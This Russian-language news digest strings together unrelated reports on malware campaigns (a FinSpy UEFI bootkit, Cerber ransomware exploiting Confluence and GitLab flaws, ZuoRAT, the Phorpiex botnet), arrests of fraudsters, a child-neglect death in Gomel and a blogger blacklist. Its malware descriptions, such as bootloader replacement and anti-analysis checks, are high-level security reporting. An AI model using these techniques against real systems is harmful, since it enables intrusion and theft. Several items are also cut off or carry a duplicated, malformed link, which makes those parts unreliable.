Адвокат хочет оспорить уголовное дело в ближайшие месяцы с конституционной жалобой: «Речь идет не о конкретном случае, а о фундаментальном вопросе о том, может ли быть наказуем простой лайк в социальных сетях.
source: ekh-legal.de/blog/strafrecht/landgericht-meiningen-liken-kann- strafbar-sein
Исследователи в области безопасности из «Лаборатории Касперского» обнаружили новую версию шпионского ПО FinSpy , которое перехватывает контроль и заменяет загрузчик Windows UEFI для заражения компьютерных систем. Данный метод позволил злоумышленникам установить буткит без необходимости обходить проверки безопасности прошивки.
По словам экспертов, заражение UEFI редко встречается и его трудно осуществить. Хотя в данном случае злоумышленники заразили не саму прошивку UEFI, а его следующий этап загрузки, атака была особенно скрытной, поскольку вредоносный модуль был установлен на отдельном разделе и мог контролировать процесс загрузки зараженного устройства.
Как отметили исследователи, это одна из самых трудных для обнаружения шпионских программ на сегодня. Шпионское ПО оснащено четырьмя различными уровнями обфускации в дополнение к вектору буткита UEFI.
В отличие от предыдущих версий FinSpy, содержащих троян сразу в зараженном приложении, новые образцы теперь защищены двумя компонентами: непостоянным пре-валидатором и пост-валидатором.
«Первый компонент выполняет несколько проверок безопасности, убеждаясь, что атакованное устройство не принадлежит исследователю в области кибербезопасности. Только после прохождения проверки сервер предоставляет пост-валидаторный компонент. Затем сервер сможет развернуть полноценное троянское ПО», — пояснили специалисты.
Шпионское ПО содержит четыре сложных кастомных обфускатора, предназначенных для замедления анализа шпионского ПО. Кроме того, троян может использовать режим разработчиков в браузерах для перехвата трафика, защищенного протоколом HTTPS.
На всех компьютерных системах, зараженных буткитом UEFI, диспетчер загрузки Windows (bootmgfw.efi) был заменен вредоносным. Когда UEFI передает выполнение вредоносному загрузчику, он сначала находит и заменяет исходный диспетчер загрузки Windows на исправленную версию, способную обойти все проверки безопасности. На старых устройствах без поддержки UEFI было зафиксировано заражение через MBR (Master Boot Record).
• Source: https://securelist.com/finspy-unseen-findings/104322/
В результате совместной операции Австралийской федеральной полиции (AFP) и Федерального бюро расследований США (ФБР), начавшейся ещё в 2020 году, были арестованы два человека, подозреваемых в разработке и распространении вредоносного программного обеспечения «Firebird», переименованного позже в «Hive».
Программа «Firebird» изначально продвигалась как легальный инструмент для удалённого администрирования, предлагая возможности скрытого доступа и восстановления паролей из различных браузеров. Эти функции позволяли пользователям, заплатившим за инструмент, удалённо получать доступ к компьютерам жертв и осуществлять несанкционированную активность.
Одному из задержанных, жителю Австралии, чьё имя не разглашается, [предъявлены обвинения](https://www.afp.gov.au/news-centre/media-release/afp-traps-alleged- rat-developer) по двенадцати пунктам, включая производство и распространение инструментов, предназначенной для совершения компьютерных преступлений. Максимальное наказание может составить 36 лет тюремного заключения, в то время как суд над ним состоится 7 мая этого года в городе Сидней.
Второй обвиняемый — Эдмонд Чахмахчян, проживающий в районе Ван-Найс Лос- Анджелеса, известен в Интернете под псевдонимом «Corruption». По данным Министерства юстиции США, Чахмахчян активно занимался маркетингом «Hive», обслуживанием транзакций в биткойнах и поддержкой покупателей. Обвинение утверждает, что он продал лицензию на использование троянца удалённого доступа (RAT) агенту ФБР под прикрытием.
Несмотря на то, что покупатель чётко указал продавцу, что его цель — украсть биткойны на сумму 20 тысяч долларов и документы на 5 тысяч долларов, подтверждая намерения использовать инструмент для незаконной деятельности, Чахмахчян продал ему вредонос без лишних вопросов и возражений.
Американская сторона также обвиняет задержанного сразу по нескольким пунктам, включая рекламу средств перехвата, передачу программного кода, компрометирующего защищённые компьютеры, а также преднамеренный несанкционированный доступ к данным.
Чахмахчян свою вину не признаёт, однако максимальное наказание, которое он может получить, составляет десять лет тюремного заключения. Итоговый приговор будет вынесен 4 июня этого года.
В апреле 2024 года в одной из квартир Гомеля было обнаружено тело умершей 10-летней девочки, ее сестры и брат были истощены без должного питания. Почему дети оказались в таком положении без медпомощи и внимания учреждений образования, а семья несколько лет проживала в областном центре буквально "призраком" и как трагические события связаны с общением многодетной матери с виртуальной рок-звездой - в прокуратуре Гомельской области БЕЛТА рассказали подробности семейной драмы.
Занявшись этим делом, в прокуратуре распутали клубок кажущихся невероятными событий. Речь о многодетной семье, у которой со стороны все казалось обычным. Гомельчанка воспитывала троих дочерей и сына. Отец детей жил отдельно. Старшие дети ходили в школу, младшие - в детский сад. С рождения они обслуживались и получали необходимую помощь в одной из городских государственных поликлиник. Все дети, за исключением средней дочери, тяжелых заболеваний и инвалидностей не имели, были привиты согласно национальному календарю.
При государственной поддержке смогли улучшить жилищные условия. В 2015 году семья приобрела квартиру в центре Гомеля с использованием льготного кредита. Однако через время все зарегистрированные в ней были выписаны. Мать строила далеко идущие, заокеанские по сути планы, которые обернулись трагедией.
Ранним апрельским утром 2024 года младшая дочка перестала дышать. Прокуратура проверила обстоятельства. По данным проверки, девочка скончалась от осложнения на фоне сахарного диабета. На тот момент семья находилась на съемной квартире в спальном районе Гомеля. По заключению, ребенок умер от наступления кетоацидотической комы. Своевременная инсулинотерапия позволила бы избежать такого трагического конца.
Мама и брат пояснили, что за две недели до смерти девочка почувствовала себя плохо. Однако женщина за медицинской помощью не обращалась, как могла, пыталась справиться с недугом самостоятельно. Так, близкие люди не оставили шанса на полноценное лечение и выздоровление. Болезнь прогрессировала, а девочке не был оказан должный медицинский уход.
Как выяснилось, с декабря 2018 года до дня смерти девочки семья проживала в стесненной обстановке однокомнатной квартиры, в антисанитарных условиях и с продуктовым минимумом. Как указывают результаты проверки прокуратуры, дети были истощены и не получали должного питания, воспитания и ухода.
Ранее у средней дочери было диагностировано хроническое заболевание, она получала качественное лечение в медучреждении. В 2017 году ребенку в связи с 4-й степенью утраты здоровья была оформлена инвалидность с рекомендацией наблюдаться у врача в течение 5 лет, но и этой рекомендации мать девочки не придерживалась. С того времени, после увольнения женщины с работы, ей было назначено пособие по уходу за ребенком-инвалидом в возрасте до 18 лет и пособие на остальных детей старше трех лет. Семья жила на ежемесячно поступающие алименты, пенсию родной бабки, а до августа 2022 года также на пенсию и пособие по инвалидности.
Оказалось, что многодетная мать лелеяла большие надежды, связанные с переездом в США. В конце 2018 года она написала заявления о снятии с учета детей во всех ведомствах. Готовясь к переезду, забрала документы младших из детского сада, старших - из школы и поликлиники.
Определенным гарантом поддержки при кардинальных жизненных переменах послужила как раз новая квартира в молодом микрорайоне Гомеля. Женщина продала ее и свыше Br57,5 тыс. перевела на счет в иностранном банке, предоставленный ей при общении в WhatsApp с неизвестным, который выдавал себя за Брайана Хью Уорнера
Гомельчанка продолжала верить в светлое будущее на новом месте, даже после того, как семья фактически оказалась без средств и без жилья. Мама с детьми словно растворилась в небытии, стала призраком. Для всех инстанций они переехали на ПМЖ за границу.
Пять лет дети не посещали школы и сады. При этом все оставались в родном городе, границу РБ не пересекали, но это обстоятельство оказалось незамеченным различными службами.
Также семья состояла на учете в центре социального обслуживания населения как многодетная с 2012 года. В 2016-2018 годах им предоставлялась государственная адресная социальная помощь, материальная поддержка к учебному году, для приобретения продуктов питания ребенку-инвалиду. "Соцработники при обследовании материально-бытового положения семьи приходили в квартиру, однако установили, что семья по данному адресу не проживает. Фактическое место проживания семьи новым жильцам известно не было. Вместе с тем в базе была отметка, что семья фактически проживает за пределами страны, однако не была снята с регистрационного учета в Беларуси", - пояснили в областной прокуратуре. Были вопросы у работников прокуратуры и по действиям представителей военкомата и ОВД, которые не приняли дополнительных мер по установлению местонахождения парня, близкого к призывному возрасту, несмотря на то, что сведения в единой базе данных по пересечению им границы отсутствовали.
Сейчас судьба семьи решается в правовом поле. Максимально учтены интересы детей, предприняты меры для их благополучного будущего.
В суде по иску прокуратуры Гомеля рассматривается гражданское дело о лишении матери родительских прав. Сейчас 12-летняя дочь определена под присмотр специалистов социально-педагогического центра. Старшая трудоустроена, а сын получил аттестат об окончании 9 классов, готовится к поступлению в колледж.
Также прокурором Гомеля возбуждено уголовное дело по ч.2 ст.159 УК в отношении многодетной матери, которая не выполнила возложенные на нее обязанности в отношении своей малолетней дочери. При этом ребенок находился в опасном для жизни и здоровья состоянии, не имея возможности принять меры к самосохранению по малолетству из-за своей беспомощности. Фактически самый родной человек заведомо оставил ее без помощи своим бездействием и несвоевременным обращением и вызовом скорой медицинской помощи, когда у девочки резко ухудшилось состояние здоровья, имея для этого возможности.
"В ситуации с этой семьей стоит указать на отсутствие должного обмена информацией между субъектами профилактики. К тому же учреждения образования обязаны были удостовериться, что дети продолжают получать гарантированное в стране образование. Прокуратурой области внесено представление в облисполком. Четыре должностных лица были привлечены к дисциплинарной ответственности", - акцентировала начальник отдела по надзору за исполнением законодательства о несовершеннолетних и молодежи прокуратуры Гомельской области Ольга Шевченко.
Также ведется следствие по факту мошенничества в отношении неизвестного лица.
Как подчеркнули в прокуратуре, по каждому делу тщательно изучаются все обстоятельства, в законном порядке будут приняты решения.
В стане шифровальщиков объявился плагиатор: новая находка ИБ-экспертов заимствует некогда грозное имя Cerber, но атакует не только Windows, но и Linux. В частности, для проникновения на серверы зловред использует недавно опубликованные RCE-уязвимости в Atlassian Confluence и GitLab.
Изначальный Cerber появился на интернет-арене в 2016 году и начал быстро набирать обороты. Через пару лет его активность стала снижаться и к концу 2019 года практически угасла.
В прошлом месяце ИБ-исследователи обнаружили в дикой природе новые образцы вымогательской программы, именуемой Cerber. Вредонос способен шифровать файлы и в Windows, и в Linux; к итогу он добавляет расширение .locked и оставляет на машине записку $$RECOVERY_README$$.html с требованием выкупа в размере от $1000 до $3000.
Анализ кода показал, что новобранец не похож на прежних представителей семейства Cerber, которые к тому же не имели шифратора для Linux. Тем не менее, авторы новоявленного зловреда позаимствовали не только имя, но также заголовок обращения к жертве и сайт для приема платежей в сети Tor.
Для внедрения шифровальщика на сервер злоумышленники используют уязвимость CVE-2021-26084 в Confluence или CVE-2021-22205 в GitLab. Обе допускают удаленный эксплойт без аутентификации и позволяют выполнить сторонний код в системе. Производители уже выпустили патчи, и PoC-коды стали достоянием общественности.
Образец, подвергнутый анализу в BleepingComputer, был нацелен на такие папки:
Операторы нью-Cerber проводят свои атаки по всему миру, уделяя особое внимание мишеням в США, Германии и Китае (совокупно более половины инцидентов, зафиксированных исследователями из Tencent). В BleepingComputer удалось также подтвердить большое количество заражений в России.
Активный патчинг Confluence и GitLab на местах, по мнению экспертов, может заставить злоумышленников переключиться на другие уязвимости, открывающие доступ к серверам.
• Source: https://www.bleepingcomputer[.]com/...omware-targets-confluence-and- gitlab-servers/
«Оперативной группой ГУ МВД России по Санкт-Петербургу и Ленинградской области на территории Донецкой Народной Республики задержаны четверо подозреваемых в мошенничестве под видом привлечения средств для биржевых операций в сети Интернет. По имеющимся данным, в течение этого года злоумышленники принимали участие в реализации криминальной схемы в отношении граждан Российской Федерации в качестве структурного звена, занимающегося обналичиванием денежных средств», – сообщила официальный представитель МВД России Ирина Волк.
Этим летом в полицию обратилась женщина, которая заявила, что стала жертвой аферистов. В одном из мессенджеров она познакомилась с мужчиной, который предложил приумножить сбережения с помощью биржевых операций. Поверив злоумышленнику, потерпевшая перевела денежные средства на указанные им счета.
«Оперативники выяснили, что сайт биржи – ложный и в качестве такового включен в соответствующий реестр Центробанка. В ходе дальнейшей работы полицейские проследили всю цепочку и установили, что похищенные сбережения пенсионерки осели в Киеве. Работники находящегося там кол-центра совершали дистанционные мошенничества в отношении россиян под видом инвестиций. С целью вывода поступивших от потерпевших денежных средств ими была организованна сеть по обналичиванию и конвертации денег на территории Донецкой Народной Республики. Российские рубли пересылались сообщникам в ДНР, а затем те обменивали их на гривны и направляли на Украину», – рассказала Ирина Волк.
Следователем УМВД России по Центральному району города Санкт-Петербурга возбуждено уголовное дело по признакам преступления, предусмотренного частью четвертой статьи 159 УК РФ. Ущерб превысил три миллиона рублей.
«В ходе обысков по адресам проживания задержанных и в оборудованных под офисы съемных квартирах изъяты мобильные телефоны, ноутбуки, банковские карты, а также почти полтора миллиона рублей.
Четверым фигурантам избрана мера процессуального принуждения в виде обязательства о явке. Предварительное расследование продолжается», – уточнила Ирина Волк.
Власти Грузии по запросу Интерпола экстрадировали в США гражданина Сербии, обвиняемого в создании мошеннических схем по отмыванию денег через криптовалюты и бинарные опционы.
По версии следствия, 48-летний Кристиян Крстич руководил основанной им крупной преступной организацией, создав не менее 20 мошеннических инвестиционных онлайн-площадок. За шесть лет от их деятельности пострадали сотни жертв по всему миру, ущерб превысил $70 млн.
Кроме того, Крстич привлек $7 млн американских инвесторов через две мошеннические платформы.
Обвиняемого задержали в Батуми 3 февраля. 30 октября завершился процесс экстрадиции в США. Крстичу грозит 20 лет тюрьмы по каждому пункту обвинения.
Напомним, в апреле 2021 года власти Грузии задержали 11 человек, подозреваемых в присвоении средств под предлогом торговли криптовалютами. Ущерб составил €620 000.
• Source: hxxps://pog.gov.ge/en/news/saqarTvelodan-ashsh-shi-70-milioni- dolaris-odenobis-kriptovalutis-motyuebiT-dauflebis-faqtze-bralde
Исследователи из Lumen's Black Lotus Labs отследили целенаправленную кампанию, в которой использовался многоступенчатый троян удаленного доступа, получивший название ZuoRAT, старгетированный на удаленных работников через маршрутизаторы малого офиса/домашнего офиса (SOHO) в Северной Америке и Европе, начиная с 2020 года, поразив как минимум 80 целей.
В своей отчете исследователи отмечают, что сложность этой кампании и ТТР злоумышленников являются отличительной чертой поддерживаемого государством субъекта угрозы.
Начало этой кампании примерно совпадает с быстрым переходом на удаленную работу после пандемии COVID-19, с начала которая резко возросло количество маршрутизаторов SOHO (включая ASUS, Cisco, DrayTek и NETGEAR), используемых сотрудниками для доступа к корпоративным сетям из дома.
При том, что они, как правило, редко контролируются или исправляются. Но широко используются для сбора данных при передаче, угона соединений и компрометации устройств в соседних сетях, как отмечают [отмечают исследователи](https://www.prnewswire.com/news-releases/lumen-discovers-new- malware-that-targeted-home-office-routers-for-two-years-301576213.html).
После развертывания на маршрутизаторе с помощью сценария обхода аутентификации, многоступенчатое вредоносное ПО ZuoRAT предоставляет злоумышленникам углубленные возможности разведки сети и сбор трафика.
ZuoRAT также реализует боковое перемещение для компрометации других устройств и разворачивания дополнительных полезных нагрузок (например, Cobalt Strike) с помощью угона DNS и HTTP.
Кроме того, в рамках кампании доставлялись еще два пользовательских трояна: один на базе C++ под названием CBeacon, нацеленный на рабочие станции Windows, и другой на основе Go, получивший название GoBeacon, который ориентирован на системы Linux и Mac, помимо устройств Windows.
Дополнительное вредоносное ПО, развернутое в системах в сетях жертв (CBeacon, GoBeacon и Cobalt Strike), [позволило](https://blog.lumen.com/zuorat-hijacks- soho-routers-to-silently-stalk-networks/) актору загружать файлы, выполнять произвольные команды, захватывать сетевой трафик, внедрять новые процессы и получать устойчивость на скомпрометированных устройствах.
Некоторые скомпрометированные маршрутизаторы также были добавлены в ботнет и использовались в качестве прокси и управления трафиком (C2), скрывая обнаружение.
По мнению ресерчеров, уровень сложности кампании, а также продемонстрированные возможности, включая получение доступа к устройствам SOHO разных марок и моделей, сбор информации о хостах и локальной сети, перехват сетевых коммуникаций для получения потенциально постоянного доступа к наземным устройствам и намеренно скрытой инфраструктуры C2, использующей многоступенчатый изолированный маршрутизатор для связи, - указывает на работу профи, который, остаётся незамеченным в периметре целевых сетей в течение многих лет. А сама кампания не ограничивается небольшим количеством обнаруженных жертв.
Пользователей криптовалюты в Эфиопии, Нигерии, Индии, Гватемале и на Филиппинах атакует новый вариант ботнета Phorpiex под названием Twizt, похищающий виртуальные монеты. За последний год злоумышленники похитили $500 тыс.
По данным ИБ-компании Check Point Research, новая версия вредоносного ПО «позволяет ботнету успешно работать без активных [C&C] серверов» и опустошать 35 кошельков, связанных с разными блокчейнами, в том числе Bitcoin, Ethereum, Dash, Dogecoin, Litecoin, Monero, Ripple и Zilliqa.
Ботнет Phorpiex, также известный как Trik, известен за рассылку спама вымогательского характера и участие в кампаниях вымогательского ПО и криптоджекинге – использовании устройств наподобие компьютеров, смартфонов и серверов для майнинга криптовалюты без ведома и согласия их владельцев.
Ботнет также использует технику под названием cryptocurrency clipping, заключающуюся в похищении криптовалюты в ходе транзакции с помощью вредоносного ПО, автоматически заменяющего адрес кошелька, куда переводятся средства, на адрес кошелька киберпреступников. Специалисты ИБ-компании Check Point выявили 60 уникальных биткойн-кошельков и 37 эфириум-кошельков, использующихся Phorpiex.
Операторы ботнета свернули свои операции и выставили исходный код на продажу в даркнете в августе 2021 года, но спустя менее двух недель его C&C-серверы заработали снова. Они стали распространять Twizt – ранее неизвестную полезную нагрузку, способную развертывать дополнительное вредоносное ПО. Кроме того, Twizt может работать в пиринговом режиме, благодаря чему ему не требуется централизованный C&C-сервер.
Зараженные Phorpiex боты были обнаружены в 96 странах мира. Ботнет предположительно перехватил порядка 3 тыс. транзакций на общую сумму в 38 биткойнов и 133 эфиров. Примечательно, что вредонос прекращает выполнение, если на системе языком по умолчанию является украинский.
• Source: [https://research.checkpoint.com/202...zt-hijacking-hundreds-of- crypto-transactions/](https://research.checkpoint.com/2021/phorpiex-botnet-is- back-with-a-new-twizt-hijacking-hundreds-of-crypto-transactions/)
Мошенники неоднократно встречались с военным прямо у здания Генпрокуратуры и рядом с посольством Мадагаскара.
Анатолию Миренкову злоумышленники постучались 23 января. Один из них представился замминистра обороны Садовенко, объяснил, что в России орудуют хитрецы, которые похищают деньги простых граждан и отправляют их на помощь ВСУ. Чтобы убедить Миренкова, следующим ему позвонил "сотрудник ФСБ" с той же сказкой.
Мошенники прислали Миренкову фейковые документы от ЦБ, где было указано, что генерал стал жертвой преступников и теперь его сбережения под угрозой. Мужчина повёлся и за несколько дней передал мошенникам 33 миллиона рублей. Наличкой и только при личной встрече по кодовому слову "Мадагаскар".
После Миренкова мошенники взялись за его супругу. Женщину заставили снять 16 миллионов и принести в указанное место. О том, что супругов развели, они догадались лишь через неделю. Миренков написал заявление в полицию. Следователям он объяснил, что в первый раз слышит о подобных схемах.
Первый зампред комиссии ОП РФ по развитию информационного сообщества, СМИ и массовых коммуникаций Александр Малькевич заявил о необходимости продумать комплекс мер по мотивации лидеров мнений к переходу на российские соцсети
Общественная палата (ОП) РФ начинает работу над созданием черного списка российских блогеров, имеющих YouTube-каналы. Об этом сообщил первый зампред комиссии ОП РФ по развитию информационного сообщества, СМИ и массовых коммуникаций Александр Малькевич в ходе круглого стола "Свой среди чужих? Российские блогеры на экстремистских иностранных площадках".
"Общественная палата сейчас в том числе начинает работать над черным списком блогеров, работающих на платформе YouTube. Мы его опубликуем, потому что это люди, которые сознательно не работают в российских соцсетях, позиционируя себя как российские блогеры", - сказал Малькевич.
По его словам, первая часть списка будет посвящена блогерам, которые работают на детскую аудиторию. "При этом многие авторы сами несовершеннолетние. Здесь предстоит разобраться - они ли ведут эти каналы или за них это делают их родители или опекуны", - сказал Малькевич.
Он отметил, что список станет частью программы по стимулированию перехода блогеров на отечественные соцсети, которую запускает ОП. "В дальнейшем он должен стать основой для разработки и принятия мер по отношению к контентмейкерам, игнорирующим наши платформы. И здесь свое слово должны сказать законодатели, потому что, раз не переходите на наши платформы, значит вы хотите скрыть свои доходы, либо по глупости, либо по привычке, либо ведете вражескую деятельность", - сказал Малькевич.
По его мнению, необходимо продумать комплекс мер по мотивации лидеров мнений к переходу на российские соцсети. "Надо помогать им в этих соцсетях. Мы опубликовали в телегам-канале ОП целый список наших нормальных, хорошо развивающихся соцсетей - аналогов западных. Все это есть, это работает", - сказал Малькевич.
sc: tass.ru/obschestvo/19946231
Темрюкский районный суд приговорил москвичку Наталью Томченко к условному сроку за мошенничество под предлогом удаления компромата из сети «Интернет», сообщила Объединенная пресс-служба судов Краснодарского края.
По ее данным, в 2022 году Томченко, действуя с неустановленными сообщниками, организовала своеобразный бизнес.
«Она предлагала девушкам за определенную плату удалить из сети «Интернет» компрометирующие их материалы. Потерпевшие, среди которых были жительницы Москвы и Краснодарского края, переводили деньги (от 15 тысяч до 70 тысяч рублей). Однако компромат так и оставался в интернете», – уточнили в суде.
Суд признал Томченко виновной в совершении преступлений, предусмотренных частью 4 статьи 159 Уголовного кодекса РФ (4 эпизода мошенничества), а также частью 3 статьи 30 частью 4 статьи 159 УК РФ (покушение на мошенничество).
Фигурантка полностью признала вину, добровольно возместила ущерб потерпевшим и извинилась перед ними.
Суд назначил ей наказание в виде лишения свободы на срок 4 года условно.
Пправда о том, что на самом деле скрывается за онлайн-мошенничествами.
12 сентября 2024 года Министерство финансов США через Управление по контролю за иностранными активами (OFAC) объявило о введении санкций против камбоджийского бизнесмена Ли Йонг Фата и его компаний за причастность к серьёзным нарушениям прав человека. В частности, Ли и его корпорация L.Y.P. Group Co., LTD обвиняются в использовании принудительного труда на онлайн- центрах мошенничества, где пострадавшие от торговли людьми вынуждены работать в тяжёлых условиях.
OFAC также ввело санкции против нескольких отелей в Камбодже, включая Garden City Hotel, Koh Kong Resort и Phnom Penh Hotel, которые находятся под контролем Ли. Данное решение призвано разрушить инфраструктуру, поддерживающую инвестиционные мошенничества, от которых пострадали тысячи людей, в том числе граждане США.
Исполняющий обязанности заместителя министра финансов по вопросам терроризма и финансовой разведки Брэдли Т. Смит отметил, что министерство продолжит бороться с преступными сетями, которые организуют подобные схемы. По его словам, действия Министерства финансов направлены на разрушение систем, эксплуатирующих людей и обманывающих доверчивых инвесторов.
Финансовые мошенники используют вымышленные личности, чтобы создать доверительные отношения с жертвами и склонить их к инвестициям в виртуальные валюты или иностранные валютные схемы. Эти операции, организованные в основном преступными группами в Юго-Восточной Азии, привели к значительным финансовым потерям. В 2023 году ущерб от инвестиционных мошенничеств вырос на 38%, достигнув $4,57 миллиарда. Особую тревогу вызывают мошенничества, связанные с криптовалютами, которые увеличились на 53% за тот же период.
Жертвы мошенничества часто оказываются самими жертвами торговли людьми и подвергаются физическому и психологическому насилию. В отчёте Государственного департамента США о торговле людьми за 2024 год отмечено, что принудительный труд в онлайн-центрах мошенничества широко распространён в Камбодже, особенно в городах О’Смач и Кох Конг. В этих местах власти не справляются с правоприменением, что усугубляется коррупцией и политической заинтересованностью.
Комплекс O-Smach Resort, принадлежащий Ли Йонг Фату, на протяжении нескольких лет фигурировал в полицейских расследованиях. Людей заманивали туда под видом предоставления работы, а затем лишали средств связи и принуждали к участию в мошеннических схемах. Некоторые жертвы, пытаясь сбежать, погибли. В 2022 и 2024 годах местные власти провели несколько спасательных операций, освободив десятки людей разных национальностей.
Санкции OFAC подразумевают блокировку активов всех лиц и компаний, причастных к нарушениям прав человека. Под ограничения попадают любые их имущественные интересы на территории США или под контролем американских граждан. Нарушители санкций рискуют столкнуться с гражданскими или уголовными наказаниями.
США продолжают использовать санкции как инструмент давления для достижения изменений в поведении тех, кто участвует в преступлениях против человечности и коррупции.
home.treasury.gov/news/press-releases/jy2576
Работники ГБР во взаимодействии с Департаментом киберполиции завершили досудебное расследование в отношении бывшей курсантки одного из правоохранительных вузов Днепропетровщины. Она обманула жительницу Днепра более чем на 800 тыс. гривен.
Обвинительный акт направлен в суд.
В специализированный вуз девушка поступила в 2020 году. На втором курсе она зарегистрировала фейковую анкету на сайте знакомств под мужским именем, а фото украла со страницы настоящего человека в одной из социальных сетей.
Познакомившись с другой девушкой, она начала писать той романтические сообщения от имени вымышленного парня. Потерпевшая, не подозревая, кто на самом деле скрывается за анкетой, дала свой номер телефона и начала активно переписываться в мессенджерах, а также периодически общаться по телефону.
Для того, чтобы голос ухажера не выдал обмана, курсантка в телефонных разговорах объясняла, что в детстве перенесла операцию на голосовых связках, поэтому так и разговаривает.
Впоследствии «ухажер» написал, что попал в армию и находится в зоне боевых действий, из-за чего в ближайшее время встретиться вживую не получится, но пообещал периодически отправлять девушке подарки через свою племянницу. Так называемой племянницей, которая частенько приносила подарки, оказалась сама подозреваемая.
В один из моментов «боец» сообщил, что попал вблизи Бахмута под вражеский обстрел и получил серьезное боевое ранение, и начал просить деньги на операцию.
Также курсантка начала активно угрожать потерпевшей, когда та медлила с деньгами. Мол, на операцию «дяди» она отдала немало своих сбережений, поэтому долг нужно возвращать. В случае проволочек она обещала немалые проблемы, ведь вроде бы имела знакомых, которые могли «выбить» эти деньги.
Потерпевшая одолжила у знакомых и родственников более 800 тыс. гривен и отправила их на счет мошенницы.
Когда фигурантку разоблачили работники ГБР, она забрала документы из Днепропетровского вуза и переехала в столицу. Здесь она поступила в правоохранительную академию, правда, на гражданскую должность. После сообщения ей о подозрении девушку отчислили из учебного заведения.
Она обвиняется в мошенничестве, совершенном в особо крупных размерах, и в вымогательстве передачи чужого имущества с угрозой насилия (ч. 4 ст. 190, ч. 4 ст. 189 УК Украины).
Санкция статьи предусматривает наказание в виде лишения свободы на срок до 12 с конфискацией имущества.
Процессуальное руководство осуществляет Днепропетровская областная прокуратура.
sc: dbr.gov.ua/news/dbr-zavershilo-rozsliduvannya-stosovno-shahrajki-z-dnipra- yaka-vidurila-ponad-800-tis.-griven-na-sajti-znajomstv
Класека, в полицию обратился 56-летний горожанин, который рассказал, что незнакомец обманул его, оформил кредиты и похитил деньги - 280 тысяч рублей. Как удалось выяснить стражам порядка, новокузнечанину позвонил сотрудник банка и поведал, что якобы из-за ошибки в программе мужчина долго не получал бонусы за пользование картой и накопил их аж восемь тысяч. По утверждениям собеседника, бонусы можно потратить на покупки либо же перевести в денежные средства.
Поверив, потерпевший сообщил ему свои данные, номер карты, а также CVC-код. Затем на телефон новокузнечанина стали приходить сообщения с паролями, их он также назвал собеседнику. Получив все необходимые данные, аферист прервал разговор, пояснив, что в ближайшее время бонусы будут перечислены, - рассказали в силовом ведомстве.
Спустя несколько дней кузбассовец проверил личный кабинет, но бонусов там не было. Мужчина обратился в банк, где ему сообщили, что от его имени было оформлено несколько кредитов, а деньги похищены.
Возбуждено уголовное дело по о мошенничестве (ч. 3 ст. 159 УК РФ).
Покидающий свою родину немецкий автогигант Mercedes-Benz напоследок [слил ](http://Покидающий свою родину немецкий автогигант Mercedes-Benz напоследок слил (https://techcrunch.com/2024/01/26/mercedez-benz-token-exposed-source- code-github/?_guc_consent_skip=1706536325) все свои наработки, оставив в сети токен доступа GitHub Enterprise Server Mercedes, который давал неограниченный и неконтролируемый доступ. Утечку ключа в общедоступном репозитории GitHub обнаружили исследователи из RedHunt Labs в ходе планового сканирования в январе. Репозитории содержали большой объем интеллектуальной собственности, включая ключи доступа к Microsoft Azure и AWS, чертежи, проектную документацию, пароли, ключи API, базу данных Postgres и исходный код Mercedes, а также другую важную корпоративную информацию. Mercedes проинформировали о проблеме безопасности в понедельник. В среду представитель Mercedes подтвердил, что компания отозвала соответствующий токен API и немедленно удалила публичный репозиторий. Mercedes неизвестно, обнаружил ли кто-либо еще, кроме RedHunt Labs, открытый ключ, который был опубликован в конце сентября 2023 года. При этом в компании отказались раскрывать сведения о возможном доступе третьих лиц к раскрытым данным.)все свои наработки, оставив в сети токен доступа GitHub Enterprise Server Mercedes, который давал неограниченный и неконтролируемый доступ.
Утечку ключа в общедоступном репозитории GitHub обнаружили исследователи из RedHunt Labs в ходе планового сканирования в январе.
Репозитории содержали большой объем интеллектуальной собственности, включая ключи доступа к Microsoft Azure и AWS, чертежи, проектную документацию, пароли, ключи API, базу данных Postgres и исходный код Mercedes, а также другую важную корпоративную информацию.
Mercedes проинформировали о проблеме безопасности в понедельник. В среду представитель Mercedes подтвердил, что компания отозвала соответствующий токен API и немедленно удалила публичный репозиторий.
Mercedes неизвестно, обнаружил ли кто-либо еще, кроме RedHunt Labs, открытый ключ, который был опубликован в конце сентября 2023 года. При этом в компании отказались раскрывать сведения о возможном доступе третьих лиц к раскрытым данным.
Международный уголовный суд (МУС), базирующийся в Гааге, недавно раскрыл обнаружение кибератаки, затрагивающей его информационные технологии (ИТ) системы. Этот инцидент подтолкнул МУС к немедленным мерам в ответ на ситуацию и для смягчения потенциальных последствий.
МУС, известный своей миссией преследования справедливости на глобальном уровне, уже стал объектом интернационального шпионажа в прошлом. В одном из случаев, произошедших в 2020 году, российский шпион, представлявшийся бразильским стажером, был задержан при попытке проникнуть в операции суда. Потенциальные последствия такой инфильтрации были значительными, так как шпион мог получить доступ к ценной информации о расследованиях МУС в отношении военных преступлений в Украине.
Этот недавний инцидент вызвал опасения относительно безопасности международных институтов, таких как МУС, которые часто занимаются чувствительными и высокостоящими делами. Работа МУС по расследованию и судебному преследованию лиц, обвиняемых в отвратительных преступлениях, включая военные преступления и преступления против человечности, делает его приоритетной целью для тех, кто стремится подорвать его деятельность.
Заметным поворотом событий стало издание МУС ордера на арест президента России Владимира Путина, что лишь усугубило уже напряженную обстановку. В ответ на это российские власти включили главного прокурора МУС Карима Хана в список "разыскиваемых". Хан, находясь на переднем крае усилий МУС, намерен обсудить вопрос "борьбы с кибероперациями в военном конфликте" на предстоящей сессии Генеральной Ассамблеи ООН. Это подчеркивает общую озабоченность вокруг киберугроз международным институтам и потенциальных последствий таких атак.
По мере того, как МУС справляется с последствиями этой кибератаки, остаются вопросы о происхождении и мотивах инцидента. Способность МУС обеспечивать безопасность своей чувствительной информации и продолжать свою работу перед вызовами этой ситуации, несомненно, будет внимательно наблюдаться мировым сообществом.
Приверженность МУС поддержанию справедливости и счетности, несмотря на различные трудности, остается свидетельством важности его миссии на мировой арене. Однако этот инцидент служит живым напоминанием о развивающейся природе угроз в мире, где стремление к справедливости пересекается с областью кибервойн.
Житель американского города Глостер (штат Нью-Джерси) признал себя виновным в мошенничестве с чеками. По данным Shore News, ему и его подельникам афера принесла более 150 тысяч долларов.
28-летний Мисти Сарфо-Аду (Misty Sarfo-Adu) работал вместе с Юджином Корантенгом (Eugene Koranteng), Эммануэлем Йиренки (Emmanuel Yirenkyi) и другими подельниками. Они приобрели пустые чеки с именами и реквизитами счетов ничего не подозревающих клиентов компании-эмитента кредитных карт. После этого они выписали эти чеки сами себе, подделали подписи клиентов и обналичили в различных банках. Кроме того, они занимались мошенничеством с использованием кредитных карточек других людей.
